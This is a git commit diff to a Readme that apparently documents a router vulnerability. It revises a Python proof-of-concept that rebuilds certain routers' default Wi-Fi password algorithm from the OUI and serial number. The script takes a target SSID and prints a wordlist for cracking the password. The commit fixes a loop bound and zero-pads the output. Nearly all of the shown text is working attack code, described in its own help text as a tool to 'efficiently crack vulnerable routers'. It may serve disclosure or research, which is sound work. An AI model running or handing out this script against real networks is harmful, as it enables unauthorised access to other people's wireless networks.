Update 'Readme.md'
parent
ff52954cad
commit
353e48ce73
1 changed files with 18 additions and 17 deletions
35
Readme.md
35
Readme.md
|
@ -493,28 +493,28 @@ With this information we can write a PoC script that can produce a wordlist to e
|
|||
import argparse, base64, hashlib, re
|
||||
|
||||
def genpwd_longpasswd(oui, serialnum):
|
||||
def str2md5(string):
|
||||
m = hashlib.md5()
|
||||
m.update(string.encode("ascii"))
|
||||
return m.digest()
|
||||
def str2md5(string):
|
||||
m = hashlib.md5()
|
||||
m.update(string.encode("ascii"))
|
||||
return m.digest()
|
||||
|
||||
#secret1 = "%s-ALCL%s" % (oui, serialnum)
|
||||
secret2 = "%s-01%u" % (oui, int(serialnum, 16))
|
||||
#secret1 = "%s-ALCL%s" % (oui, serialnum)
|
||||
secret2 = "%s-01%u" % (oui, int(serialnum, 16))
|
||||
|
||||
#md5_secret1 = str2md5(secret1)
|
||||
md5_secret2 = str2md5(secret2)
|
||||
#md5_secret1 = str2md5(secret1)
|
||||
md5_secret2 = str2md5(secret2)
|
||||
|
||||
#wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
|
||||
#wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
|
||||
|
||||
lower = upper = 0
|
||||
lower = upper = 0
|
||||
|
||||
for i in range(8):
|
||||
upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
|
||||
lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
|
||||
for i in range(8):
|
||||
upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
|
||||
lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
|
||||
|
||||
longpasswd = ((upper<<32)+lower)%0x2540be400
|
||||
longpasswd = ((upper<<32)+lower)%0x2540be400
|
||||
|
||||
return longpasswd
|
||||
return longpasswd
|
||||
|
||||
parser = argparse.ArgumentParser(prog="poc", description="A poc script to efficiently crack vulnerable routers")
|
||||
parser.add_argument("ssid", type=str, help="the ssid to attack")
|
||||
|
@ -551,8 +551,9 @@ for s in ssids:
|
|||
serialBytes = args.ssid
|
||||
for r in s.split("[A-F0-9]{4}"):
|
||||
serialBytes = serialBytes.replace(r, "")
|
||||
for i in range(0xffff):
|
||||
print(genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes)))
|
||||
for i in range(0xffff + 1):
|
||||
candidate = genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes))
|
||||
print(f"{candidate:010}")
|
||||
break
|
||||
```
|
||||
|
||||
|
|